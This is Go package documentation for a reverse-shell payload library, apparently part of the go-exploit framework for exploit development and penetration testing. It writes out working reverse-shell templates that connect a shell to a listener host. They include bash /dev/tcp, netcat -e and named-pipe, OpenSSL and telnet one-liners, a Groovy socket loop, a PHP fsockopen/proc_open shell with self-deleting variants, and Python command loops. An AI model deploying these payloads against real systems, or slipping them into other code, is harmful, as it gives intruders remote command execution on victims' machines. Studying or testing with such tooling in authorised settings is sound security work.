Overview ¶
Reverse shell and command payloads.
The reverse package contains all the code for reverse shell payloads. Each of these payload types can be used either in the raw string format for manipulation or via the specific payload type provided by the project.
This package is designed to be abstract enough to allow several styles of composition while acknowledging that payloads are almost always string- or byte-oriented. With that in mind, every payload can be produced either through a constructed payload type or by formatting the raw template string directly.
For example, the following calls each build a netcat reverse-shell payload. The first and the third produce the same string, because `Default` resolves to `NetcatDefault` (i.e. `NetcatGaping`); `Mknod` produces the named-pipe variant instead, and its raw template `NetcatMknod` takes the pipe name four times around the host and port, so it cannot be filled with `fmt.Sprintf(reverse.NetcatMknod, host, port)` alone:
reverse.Netcat.Default("127.0.0.1", 1337) reverse.Netcat.Mknod("127.0.0.1", 1337) fmt.Sprintf(reverse.NetcatDefault, "127.0.0.1", 1337)
Each payload family is expected to expose a `<Family>Default` constant (and a matching `Default` method) that selects the most commonly useful variant.
Index ¶
- Constants
- Variables
- type BashPayload
- type Default
- type GJScriptPayload
- type GroovyPayload
- type JJSScriptPayload
- type JavaPayload
- type NetcatPayload
- type OpenSSLPayload
- type PHPPayload
- func (php *PHPPayload) Default(lhost string, lport int) string
- func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
- func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string
- func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string
- type PythonPayload
- type Reverse
- type TelnetPayload
Constants ¶
// BashTCPRedirection is the template for a bash reverse shell built on
// bash's /dev/tcp/<host>/<port> redirection. Format arguments in order:
// listener host (%s) and port (%d). The outer `bash -c` presumably exists so
// the redirect is parsed by bash even if the injection point's shell is not
// bash; the connection itself is plain TCP, not encrypted.
const BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`

// BashDefault is the template that reverse.Bash.Default formats; it is the
// /dev/tcp redirection variant.
const BashDefault = BashTCPRedirection
const ( GJScriptDefault = GJScriptGLibSpawn GJScriptGLibSpawn = `` /* 528-byte string literal not displayed */ )
// GroovyClassic is a one-line Groovy reverse shell. It starts /bin/sh, or
// cmd.exe when os.name contains "Windows", through ProcessBuilder and pumps
// bytes between the process and a plain (unencrypted) java.net.Socket.
// Format arguments in order: listener host (%s) and port (%d).
//
// Because redirectErrorStream(true) merges stderr into the process's stdout
// stream, the loop that drains pe (getErrorStream) normally sees no data.
// The polling loop sleeps 50 ms per iteration and exits once the process
// has terminated (exitValue stops throwing) or the socket is closed.
const GroovyClassic = `shell='/bin/sh';` +
	`if(System.getProperty('os.name').indexOf('Windows')!=-1)shell='cmd.exe';` +
	`Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();` +
	`Socket s=new Socket('%s',%d);` +
	`InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();` +
	`OutputStream po=p.getOutputStream(),so=s.getOutputStream();` +
	`while(!s.isClosed()){` +
	`while(pi.available()>0)so.write(pi.read());` +
	`while(pe.available()>0)so.write(pe.read());` +
	`while(si.available()>0)po.write(si.read());` +
	`so.flush();po.flush();Thread.sleep(50);` +
	`try {p.exitValue();break;}catch (Exception e){}};` +
	`p.destroy();s.close();`

// GroovyDefault is the template reverse.Groovy.Default formats.
const GroovyDefault = GroovyClassic
const ( JavaDefault = JavaProcessBuilderInteractive JavaProcessBuilderInteractive = `` /* 670-byte string literal not displayed */ )
// NetcatGaping hands /bin/sh directly to netcat via -e. The name refers to
// the build option that enables -e ("GAPING_SECURITY_HOLE"); netcat builds
// without it (notably the OpenBSD-derived nc shipped by many distributions)
// reject the flag, in which case NetcatMknod is the portable fallback.
// Format arguments in order: listener host (%s) and port (%d).
const NetcatGaping = `nc %s %d -e /bin/sh`

// NetcatMknod drives an interactive /bin/sh through a named pipe in /tmp so
// it works with any netcat that lacks -e. The pipe name is substituted four
// times; the format arguments in order are: pipe, pipe, host (%s), port
// (%d), pipe, pipe. The pipe is removed once nc exits. Traffic is plaintext.
const NetcatMknod = `cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;`

// NetcatDefault is the template reverse.Netcat.Default formats.
const NetcatDefault = NetcatGaping
// OpenSSLMknod wraps an interactive sh in a TLS connection made with
// `openssl s_client -quiet`, using a named pipe created by mknod. Format
// arguments in order: pipe, pipe, host (%s), port (%d), pipe, pipe.
// Note that s_client does not abort on certificate verification failure by
// default, so the listener is not authenticated; the channel is encrypted,
// not mutually trusted.
const OpenSSLMknod = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`

// OpenSSLMkfifo is identical to OpenSSLMknod except that the pipe is created
// with mkfifo, for targets where mknod is unavailable or restricted.
const OpenSSLMkfifo = `cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`

// OpenSSLDefault is the template reverse.OpenSSL.Default formats.
const OpenSSLDefault = OpenSSLMknod
const ( PHPDefault = PHPLinuxInteractive PHPLinuxInteractive = `<?php $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>` PHPUnflattened = `` /* 1604-byte string literal not displayed */ PHPUnflattenedSelfDelete = `` /* 1704-byte string literal not displayed */ )
// Python27 is a command loop, not a PTY: each chunk received from the
// listener is executed with subprocess.Popen(..., shell=True), the loop
// blocks until that command's stdout and stderr reach EOF, the child's stdin
// pipe is never written to, and the literal line "exit" ends the session.
// Interactive programs therefore cannot be driven through it.
//
// Python27Secure is the same loop over ssl.wrap_socket(..., cert_reqs=CERT_NONE):
// traffic is encrypted but the listener's certificate is never verified.
// NOTE(review): ssl.wrap_socket was deprecated in Python 3.7 and removed in
// 3.12, so this variant fails on current interpreters despite the "3+" claim
// — confirm the target's Python version before relying on it.
//
// The indentation inside the string literals below appears collapsed by the
// documentation renderer; the real source uses Python block indentation.
const ( PythonDefault = Python27 Python27 = "import socket\n" + "import subprocess\n" + "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" + "s.connect(('%s', %d))\n" + "while 1:\n" + " data = s.recv(1024).decode('UTF-8')\n" + " if data == 'exit\\n':\n" + " break\n" + " if len(data) > 0:\n" + " proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n" + " s.send(proc.stdout.read() + proc.stderr.read())\n" + "s.close()\n" Python27Secure = "import socket\n" + "import subprocess\n" + "import ssl\n" + "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" + "s.connect(('%s', %d))\n" + "sslsock = ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)\n" + "while 1:\n" + " data = sslsock.recv(1024).decode('UTF-8')\n" + " if data == 'exit\\n':\n" + " break\n" + " if len(data) > 0:\n" + " proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n" + " sslsock.send(proc.stdout.read() + proc.stderr.read())\n" + "sslsock.close()\n" )
// Telnet templates. All four route a shell through a named pipe in /tmp and
// remove it afterwards; traffic is plaintext. The "NoColon" variants pass
// the port as a separate argument (`telnet host port`) for telnet clients
// that do not accept the `host:port` form. Format arguments in order:
// pipe, pipe, host (%s), port (%d), pipe, pipe.
//
// The Mknod variants run `sh -i` with stderr merged into the connection.
// The Mkfifo variants run a non-interactive `sh` and only redirect stdout
// (`1>`), so command errors never reach the listener.
const (
	// TelnetMknod: interactive sh, pipe via mknod, `host:port` syntax.
	TelnetMknod = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s:%d > %s; rm %s;`
	// TelnetMknodNoColon: interactive sh, pipe via mknod, `host port` syntax.
	TelnetMknodNoColon = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s %d > %s; rm %s;`
	// TelnetMkfifo: non-interactive sh, pipe via mkfifo, `host:port` syntax.
	TelnetMkfifo = `cd /tmp; mkfifo %s; telnet %s:%d 0<%s | sh 1>%s; rm %s;`
	// TelnetMkfifoNoColon: non-interactive sh, pipe via mkfifo, `host port` syntax.
	TelnetMkfifoNoColon = `cd /tmp; mkfifo %s; telnet %s %d 0<%s | sh 1>%s; rm %s;`
)

// TelnetDefault is the template reverse.Telnet.Default formats when its
// colon argument is true.
const TelnetDefault = TelnetMknod
Variables ¶
// Package-level singletons, one per payload family, so callers can write
// reverse.Bash.Default(...) without constructing anything. Every *Payload
// type is an empty struct, so sharing a single instance is safe.
var (
	Bash     = &BashPayload{}
	GJScript = &GJScriptPayload{}
	Groovy   = &GroovyPayload{}
	JJS      = &JJSScriptPayload{}
	Java     = &JavaPayload{}
	Netcat   = &NetcatPayload{}
	OpenSSL  = &OpenSSLPayload{}
	PHP      = &PHPPayload{}
	Python   = &PythonPayload{}
	Telnet   = &TelnetPayload{}
)
Package-level singletons that make each payload family reachable as `reverse.Bash`, `reverse.Netcat`, `reverse.PHP`, and so on. The payload structs carry no fields, so one shared instance per family is safe to use from anywhere.
Functions ¶
This section is empty.
Types ¶
type BashPayload ¶
// BashPayload is the stateless receiver for the bash reverse-shell
// constructors (Default, TCPRedirection); the package exposes a shared
// instance as reverse.Bash.
type BashPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*BashPayload) Default ¶
func (bash *BashPayload) Default(lhost string, lport int) string
Default returns BashDefault formatted with lhost and lport. It relies on bash's built-in `/dev/tcp/<host>/<port>` redirection, which is compiled into most bash builds but can be disabled at build time; the payload therefore fails on targets whose bash lacks net redirections or where the command is executed by a shell other than bash.
Example ¶
package main

import (
	"fmt"

	"github.com/vulncheck-oss/go-exploit/payload/reverse"
)

// Print the default bash reverse-shell payload pointed at a local listener.
func main() {
	const lhost, lport = "127.0.0.1", 1337
	payload := reverse.Bash.Default(lhost, lport)
	fmt.Println(payload)
}
Output: bash -c 'bash &> /dev/tcp/127.0.0.1/1337 <&1'
func (*BashPayload) TCPRedirection ¶
func (bash *BashPayload) TCPRedirection(lhost string, lport int) string
TCPRedirection formats BashTCPRedirection, which uses bash's `/dev/tcp/` pseudo-device redirection to attach an interactive bash to the listener over plain, unencrypted TCP.
type GJScriptPayload ¶
// GJScriptPayload is the stateless receiver for the GJScript reverse-shell
// constructors (the GLib spawn variant, GJScriptGLibSpawn); the package
// exposes a shared instance as reverse.GJScript.
type GJScriptPayload struct{}
Defines the GJScript struct and all associated payload functions.
type GroovyPayload ¶ added in v1.16.0
// GroovyPayload is the stateless receiver for the Groovy reverse-shell
// constructors (Default, GroovyClassic); the package exposes a shared
// instance as reverse.Groovy.
type GroovyPayload struct{}
Defines the Groovy struct and all associated payload functions.
func (*GroovyPayload) Default ¶ added in v1.16.0
func (groovy *GroovyPayload) Default(lhost string, lport int) string
func (*GroovyPayload) GroovyClassic ¶ added in v1.16.0
func (groovy *GroovyPayload) GroovyClassic(lhost string, lport int) string
A short Groovy payload that starts `/bin/sh` (or `cmd.exe` when `os.name` contains "Windows") through ProcessBuilder and shuttles its input and output over a plain `java.net.Socket`; the connection is not encrypted.
type JJSScriptPayload ¶
// JJSScriptPayload is the stateless receiver for the jjs (Nashorn)
// reverse-shell constructor Default; the package exposes a shared instance
// as reverse.JJS.
type JJSScriptPayload struct{}
Defines the JJS script struct and all associated payload functions.
func (*JJSScriptPayload) Default ¶
func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string
Generates a script that creates a reverse shell via jjs (the Java JavaScript engine). It is an adapted version of Frohoff's original gist. When `ssl` is true the script also disables TLS validation, using logic adapted from a blog post by Callan Howell-Pavia — meaning the listener is not authenticated, only the transport is encrypted.
The script will autodetect if the platform is Windows and provide a 'cmd.exe' shell. Otherwise bash is used.
https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/ https://gist.github.com/frohoff/8e7c2bf3737032a25051
type JavaPayload ¶
// JavaPayload is the stateless receiver for the Java reverse-shell
// constructors (Default, UnflattenedJava); the package exposes a shared
// instance as reverse.Java.
type JavaPayload struct{}
Defines the Java struct and all associated payload functions.
func (*JavaPayload) Default ¶
func (java *JavaPayload) Default(lhost string, lport int) string
Defaults to the UnflattenedJava payload.
func (*JavaPayload) UnflattenedJava ¶
func (java *JavaPayload) UnflattenedJava(lhost string, lport int) string
An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out the shell using ProcessBuilder and then redirects input/output to/from the sockets.
type NetcatPayload ¶
// NetcatPayload is the stateless receiver for the netcat reverse-shell
// constructors; the package exposes a shared instance as reverse.Netcat.
type NetcatPayload struct{}
Defines the Netcat struct and all associated payload functions.
type OpenSSLPayload ¶
// OpenSSLPayload is the stateless receiver for the openssl s_client
// reverse-shell constructors (Default); the package exposes a shared
// instance as reverse.OpenSSL.
type OpenSSLPayload struct{}
Defines the OpenSSL struct and all associated payload functions.
func (*OpenSSLPayload) Default ¶
func (openssl *OpenSSLPayload) Default(lhost string, lport int) string
type PHPPayload ¶
// PHPPayload is the stateless receiver for the PHP reverse-shell
// constructors (Default, LinuxInteractive, Unflattened,
// UnflattenedSelfDelete); the package exposes a shared instance as
// reverse.PHP.
type PHPPayload struct{}
Defines the PHP struct and all associated payload functions.
func (*PHPPayload) LinuxInteractive ¶
func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
A short payload that opens a plain `fsockopen` connection and attaches `/bin/sh -i` to it with `proc_open`. The connection is unencrypted and Linux-only; use Unflattened with `encrypted` set to true when the traffic must be protected.
func (*PHPPayload) Unflattened ¶
func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string
Creates a PHP reverse shell that autodetects the operating system and selects `cmd.exe` or `/bin/sh` accordingly. The `encrypted` flag chooses whether the reverse connection is encrypted (true) or plaintext (false).
reverse.PHP.Unflattened("10.9.49.80", 1270, true).
func (*PHPPayload) UnflattenedSelfDelete ¶ added in v1.33.0
func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string
Same as Unflattened, but the payload additionally attempts to delete its own file from disk right away and registers destructors that delete it again when the command exits.
type PythonPayload ¶
// PythonPayload is the stateless receiver for the Python reverse-shell
// constructors (Python27, SecurePython27); the package exposes a shared
// instance as reverse.Python.
type PythonPayload struct{}
Defines the Python struct and all associated payload functions.
func (*PythonPayload) Python27 ¶
func (py *PythonPayload) Python27(lhost string, lport int) string
An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux. It is a command loop rather than a PTY: each chunk received from the listener is run through `subprocess.Popen(..., shell=True)`, the loop blocks until that command's stdout and stderr reach EOF, nothing is ever written to the child's stdin, and the literal line `exit` closes the socket. Interactive programs (editors, `su`, password prompts) therefore cannot be driven through it.
func (*PythonPayload) SecurePython27 ¶
func (py *PythonPayload) SecurePython27(lhost string, lport int) string
An unflattened reverse shell that uses an SSL socket and works on Python 2.7, 3+, Windows and Linux. The socket is wrapped with `cert_reqs=ssl.CERT_NONE`, so the traffic is encrypted but the listener is never authenticated — "secure" here means confidentiality on the wire, not protection against an interposed listener. Note that `ssl.wrap_socket` was deprecated in Python 3.7 and removed in 3.12, so this payload fails on current interpreters; check the target's Python version before relying on it.
type Reverse ¶
// Reverse is the common interface for payload families. It embeds Default,
// so any payload type that provides the Default constructor satisfies it
// and can be handled generically by callers.
type Reverse interface { Default }
Reverse is the interface every payload family satisfies by embedding Default; it lets callers hold any payload type behind a single type and call its Default constructor.
type TelnetPayload ¶
// TelnetPayload is the stateless receiver for the telnet reverse-shell
// constructors (Default); the package exposes a shared instance as
// reverse.Telnet.
type TelnetPayload struct{}
Defines the Telnet struct and all associated payload functions.
func (*TelnetPayload) Default ¶
func (telnet *TelnetPayload) Default(lhost string, lport int, colon bool) string